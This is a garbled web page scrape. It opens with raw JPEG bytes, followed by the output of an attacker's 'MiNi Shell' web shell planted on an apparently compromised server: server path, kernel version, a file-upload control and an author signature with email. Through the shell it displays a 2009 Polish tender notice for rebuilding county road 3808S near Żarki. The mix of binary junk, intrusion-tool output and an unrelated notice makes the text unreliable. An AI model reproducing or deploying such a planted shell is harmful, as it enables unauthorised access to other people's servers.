JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/134180-N-2009.html

<p class="kh_header"><b>Żarki: Przebudowa drogi powiatowej Nr 3808S odcinek Helenówka-Jaworznik</b><br>
<b>Numer ogłoszenia: 134180 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Myszkowie , ul. Myszkowska 59, 42-310 Żarki, woj. śląskie, tel. 034 3148304, faks 034 3148304.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzd.myszkow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pzd.myszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej Nr 3808S odcinek Helenówka-Jaworznik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje realizację zakresu rzeczowego robót budowlanych - drogowych polegających na wykonaniu przebudowy drogi powiatowej nr 3808 S odcinek Helenówka - Jaworznik  o długości 2 ,922 km

1.	Zakres przebudowy drogi obejmuje roboty drogowe na odcinku 2,922 km zgodnie z przedmiarem robót , specyfikacjami wykonania i odbioru robót oraz  wytycznymi technicznymi : 
          -  roboty przygotowawcze    
          -  roboty ziemne                     
          -  odwodnienie korpusu drogowego 
          -  wykonanie podbudowy
          -  wykonanie nawierzchni 
          -  roboty wykończeniowe
          -  oznakowanie dróg i urządzenia bezpieczeństwa ruchu 

2. Szczegółowy zakres przedmiotu zamówienia został określony w załączonych dokumentach:
          -  projekt budowlano-wykonawczy
          -  przedmiar robót
          -  specyfikacje techniczne wykonania i odbioru robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Kwota wadium wymagana do wzięcia udziału w postępowaniu :  50.000,00 zł
Słownie złotych: pięćdziesiąt  tysięcy złotych  00/100.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią następujące warunki:
1.1 - posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek poosiadania takich uprawnień; 
  a) z aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej,  załączonego do oferty i  wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, będzie wynikał przedmiot działalności firmy, odpowiadający przedmiotowi zamówienia:
b)	do oferty będą załączone dokumenty uprawniające  kierownika budowy  do kierowania i  nadzorowania robót budowlanych w specjalności  odpowiadającej przedmiotowi  zamówienia oraz będzie  załączone zaświadczenie, że jest on aktualnym członkami Izby Inżynierów Budownictwa i jest ubezpieczony od odpowiedzialności cywilnej w zakresie pełnionej funkcji;
1.2  - posiadają niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do  udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
             
a)	w wykazie  zrealizowanych robót budowlanych w ciągu ostatnich pięciu  lat przed wszczęciem    postępowania o  udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności     jest krótszy -  w tym okresie, który należy załączyć do oferty , będą wykonane  minimum   2 zadania  odpowiadające swoim rodzajem przedmiotowi zamówienia  o wartości minimum     2.000.000,00 zł (brutto) każda, z podaniem ich  wartości  oraz daty i miejsca wykonania 
      - na lub wg druku stanowiącego Załącznik Nr 3 do SIWZ      
      Do każdego wykazanego zadania należy dołączyć dokument , że roboty zostały wykonane   należycie. Dokumenty należy przedstawić w kolejności zgodnej z wykazem. Przez roboty odpowiadające swoim rodzajem przedmiotowi zamówienia rozumie się   przebudowę dróg publicznych polegających na wykonaniu robót z zakresu wykonania    nawierzchni bitumicznych.
 b)   w wykazie  niezbędnych do wykonania zamówienia narzędzi i urządzeń  jakimi dysponuje lub    będzie dysponował wykonawca, który należy  załączyć do oferty , wykonawca wykaże sprzęt i     urządzenia  własne i obce(np. dzierżawione, wylesingowane itp.) , które będzie używał przy      realizacji zamówienia, przy czym  wykonawca  musi wykazać minimum posiadania:  
                   - walec drogowy stalowy wibracyjny 8-10T   - 1 szt
                   - walec drogowy gumowo-stalowy               - 1 szt 
                   - skrapiarka samojezdna do bitumu              - 1 szt         
                   - samochody samowyładowcze min 10 T wyposażone w plandeki     -  4 szt 
                   - szczotka mechaniczna (bez ciągnika) -         1 szt 
                   -  rozkładarka mas bitumicznych wyposażona w elektroniczny układ kontroli równości i ubijaki
                      zagęszczające                                                - 1szt
                   -  frezarka                                                          - 1szt      
                   -  wytwórnia mas bitumicznych o wydajności nie mniejszej niż 100Mg/godz z automatycznym
                      zespołem sterowania procesem produkcji, własna lub  umowa podpisana z taką wytwórnią na
                      obsługę  przedmiotu zamówienia   na  lub wg druku  stanowiącego Załącznik Nr 5  do SIWZ

b)	z pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania  zamówienia narzędzi lub urządzeń, jeżeli w wykazie ,o którym mowa w pkt b, wykonawca    wskazał narzędzia i urządzenia, którymi będzie dysponował, będzie wynikało, że podmioty     udostępnią niezbędne narzędzia i urządzenia  na okres realizacji przedmiotu zamówienia;
 
c)	w wykazie  osób, którymi dysponuje lub będzie dysponował wykonawca i które będą     uczestniczyć w wykonaniu zamówienia, wykonawca poda imiona i nazwiska  osób wraz z    informacjami na temat ich kwalifikacji zawodowych ,  doświadczenia i wykształcenia    niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności   na lub wg  dokumentu stanowiącego  Załącznik Nr 4 do SIWZ; 
e)   z pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania    zamówienia, jeżeli w wykazie, którym mowa w pkt d , wykonawca wskazał osoby, którymi będzie       dysponował , będzie wynikało ,że podmioty udostępnią osoby zdolne do wykonania zamówienia   w terminie realizacji przedmiotu zamówienia;
f) w wykazie podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, załączonym do oferty wykonawca poda nazwy i adresy firm, które przewidywane będą do wykonania   zamówienia jako podmioty występujące wspólnie, jeżeli jest to przewidziane , określając zakres     robót przewidzianych do wykonania przez  podwykonawców - wzór dokumentu stanowi   Załącznik Nr 6  do SIWZ; 
 1.3	- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
      
a)	wykonawca będzie posiadał aktualnie obowiązującą  polisę ubezpieczenia o wartości min.1.000.000 PLN lub inny dokument potwierdzający, że jest on ubezpieczony od odpowiedzialności cywilnej, w zakresie   prowadzonej działalności;

1.4	- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;

   a)	z oświadczenia  Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22     Prawa zamówień publicznych, będzie wynikało, że  wykonawca spełnia wszystkie    warunki udziału w postępowaniu i nie podlega wykluczeniu z postępowania o   udzielenie zamówienia - wzór dokumentu stanowi Załącznik Nr 2 do SIWZ
b)	z aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, załączonych do oferty i wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert , będzie wynikało, że wykonawca nie zalega  z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

c)	z aktualnej informacja z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert załączonej do oferty , będzie wynikało ,że wykonawca nie figuruje w rejestrze skazanych;

d)	z aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1      pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,  załączonej do oferty ,będzie wynikało że, wykonawca jako podmiot zbiorowy , nie figuruje w  rejestrze karnym.   
2.  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 

3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia. 
4. Jeżeli zostanie wybrana oferta złożona przez wykonawców ubiegających się wspólnie o udzielenie zamówienia , to zamawiający przez zawarciem umowy będzie żądał umowy regulującej współpracę tych wykonawców.

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty   złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/ nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca załączy do oferty następujące dokumenty :
                        
1)  Oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia - wzór 
     dokumentu załączony jest do SIWZ 
                         
2)   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności 
      gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji 
      działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania
      ofert. 

3)   Dokumenty uprawniające kierownika budowy do kierowania i nadzorowania robót budowlanych w
specjalnościach odpowiadających przedmiotowi zamówienia oraz załączone zaświadczenie, że jest on aktualnym członkiem Izby Inżynierów Budownictwa i jest ubezpieczony od odpowiedzialności cywilnej w zakresie  pełnionej funkcji;

4)    Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu 
       Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające 
       odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie 
       zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
       lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
                                 organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
                         
                        5)     Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego  
                                organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.        
                                24  ust. 1 pkt 4-8 - Prawo zamówień Publicznych (na temat karalności wykonawcy) , 
                        

                         6)      Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9
                                   w/w ustawy ( na temat karalności podmiotów zbiorowych) 

7)     Wykaz wykonanych robót budowlanych w okresie  ostatnich pięciu  lat przed wszczęciem postępowania 
        o udzielenie zamówienia publicznego , a jeżeli okres prowadzenia działalności jest krótszy -
  w tym okresie,  odpowiadających swoim rodzajem i wartością robotom budowlanym    
  stanowiącym  przedmiot zamówienia, z podaniem ich  wartości  oraz załączeniem dokumentów  
  potwierdzających, że roboty te zostały wykonane  należycie - wzór dokumentu załączony jest do SIWZ 

8)     Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń , którymi dysponuje lub będzie dysponował wykonawca  - wzór dokumentu załączony jest do SIWZ 

9)     Pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia 
  narzędzi i urządzeń, jeżeli w wykazie, o którym mowa w pkt 8, wykonawca   wskazał narzędzia i    
  urządzenia, którymi będzie dysponował .

10)    Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w 
   wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych ,  doświadczenia i 
   wykształcenia niezbędnych do wykonania zamówienia a także zakresu   wykonywanych przez nie 
   czynności - wzór dokumentu załączony jest do SIWZ 
 
11)    Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
         jeżeli w wykazie o którym mowa w pkt .10) wykonawca wskazał osoby, którymi będzie dysponował.

12.    Wykaz podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, a także zakres  
  przewidzianych do wykonania przez nich czynności - wzór dokumentu  załączony do SIWZ  

13)    Polisę , a w przypadku jej braku inny dokument potwierdzający, że wykonawca  jest  ubezpieczony 
        od  odpowiedzialności cywilnej, w zakresie prowadzonej działalności;

2. Wykonawca zamieszkały poza terytorium Rzeczpospolitej Polskiej:

 1)  Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,   zamiast dokumentów, o których mowa w pkt. 1, ppkt 2), 4), 6) składa dokument lub dokumenty, wystawione   w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości -  ( dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert).   b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - ( dokument powinien być wystawiony nie wcześniej niż 3 miesięcy przed upływem składania ofert).   c)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie - ( dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem składania ofert).    2)  Zamiast dokumentu, o którym mowa w pkt.1, ppkt 5) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   3) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt.1) zastępuje się je dokumentem 
zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. 1).    
3. Postanowienia dotyczące składanych dokumentów

1) Dokumenty winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę  lub przedstawicieli wykonawcy, wskazanych w dokumencie rejestrowym lub w udzielonym pełnomocnictwie.

2) Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
3)  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 
4)  Dokumenty, o których mowa w pkt 1,  ppkt. 1), 7), 8), 9) , 10), 11), 12)  są składane w formie oryginału. Pozostałe dokumenty wykonawca załączy do oferty w oryginale lub jako kserokopie.     W przypadku dołączenia kserokopii, winny być one potwierdzone za zgodność z oryginałem przez  przedstawicieli wykonawcy, wskazanych w dokumencie rejestrowym lub w udzielonym pełnomocnictwie.

5)  Na kserokopii dokumentu należy zamieścić zapis: za zgodność z oryginałem  i czytelny podpis lub parafkę i pieczątkę imienną.  Kserokopie dokumentów potwierdzone w inny sposób niż wyżej opisany, zostaną uznane za niezgodne ze SIWZ i będzie to przyczyną odrzucenia oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pzd.myszkow .pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Myszkowie z/s w Żarkach 
	                                        ul. Myszkowska 59
	                                             42-310 Żarki
Sekcja Techniczna pokój Nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2009 godzina 10:00, miejsce: Powiatowy Zarząd Dróg w Myszkowie  /s w Żarkach ul. Myszkowska 59, 42-310 Żarki  (sekretariat)-pok. Nr 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com